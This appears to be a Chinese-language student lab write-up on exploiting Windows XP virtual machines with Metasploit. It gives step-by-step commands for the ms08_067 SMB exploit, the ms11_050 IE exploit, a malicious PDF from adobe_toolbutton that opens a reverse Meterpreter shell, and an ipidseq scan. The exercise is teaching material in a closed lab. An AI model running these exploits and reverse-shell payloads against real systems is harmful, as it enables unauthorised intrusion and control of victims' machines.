实验过程
实验系统
-
所需设备:
- 靶机1:Windows XP Professional SP2 ,IP地址:192.168.1.128
- 靶机2:Windows XP Professional SP3 ,IP地址:192.168.1.133
~ windows XP的虚拟机安装可以在这个网址下载iso镜像,至于序列号就百度吧,会有很多。
Kali IP地址:192.168.1.115
1、主动攻击:ms08_067
使用靶机1和Kali
-
进入msf之后,用search ms08_067查询一下针对该漏洞的攻击模块:
-
用
use exploit/windows/smb/ms08_067_netapi使用该模块: -
用
show targets查看可以被攻击的靶机的操作系统型号:
-
用
show payloads查看可以供我们使用的攻击载荷:
-
从中找到一个可用的攻击载荷
generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp:
-
用
show options查看需要设置的参数:
-
这里需要设置RHOST(靶机IP)和LHOST(Kali的IP),使用set 需设置的参数名 参数值命令即可设置:
-
设置target选项目标
-
确认参数设置无误后,用exploit指令开始攻击:
-
攻击成功后会获取靶机的shell,可以对其进行操作:
2、针对浏览器的攻击:ms11_050
使用靶机2和Kali(一开始用自己的最后会有问题,所以换了老师之前的kali)
-
用
search ms11_050查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement使用该模块:
-
用
info查看该模块的信息(这个指令相当于show targets、show options等的集合版):
基本信息:
targets信息:
options信息:
-
用
set payload windows/meterpreter/reverse_tcp设置payload,并设置需要设置的参数。
-
用
show options确认需要设置的参数是否已经设置好:
-
确认参数设置无误后,用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:
-
在靶机IE上输入该网址:
kali中显示session 1已经创建,并显示其会话ID:
-
输入
sessions -i 1,成功获取靶机的shell,可以对其进行操作:
3、针对客户端的攻击:adobe_toolbutton
使用靶机1和Kali
-
用
search adobe查询一下针对该漏洞的攻击模块:
-
选择一个模块并使用该模块:
-
用
show targets查看可以被攻击的靶机的操作系统型号:
-
设置相应参数,实施exploit攻击,发现在
/root/.msf4/local/目录下成功生成了一个liuhao307.pdf文件:
-
这个时候你可能在你的kali中找不到这个pdf文件,那么打开文件夹的隐藏文件显示就可以找到啦
-
将pdf文件粘贴到靶机win xp
-
在kali中和前几次实验一样打开并设置监听模块use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,再设置IP以及端口
-
在靶机上打开刚刚那个pdf文件(这个时候可能xp没有adobe就需要下载一波,地址呢可以到这里下载),可以观察到Kali成功获取了靶机的shell,可以对其进行操作:
4、成功应用任何一个辅助模块:ipidseq
功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。
-
拥有递增的IPID的空闲(空闲是指该主机在特定时间内不向网络发送数据包)主机(即显示为
Incremental!的条目),不会被网络上的其它主机严重影响,可以用来进行TCP空闲扫描。
TCP空闲扫描:是一种高级的nmap扫描方式,这种扫描方式能让我们冒充网络上另一台主机的IP地址对目标进行更为隐秘的扫描。
-
用show auxiliary查看所有辅助模块,并选择其中的一个,选的是scanner/ip/ipidseq:
-
查看需要设置的参数,设置完成后确认一下,这里可以进行对单一目标主机的扫描,然后就可以开始exploit了。
-
也可以对指定网段的主机进行扫描:
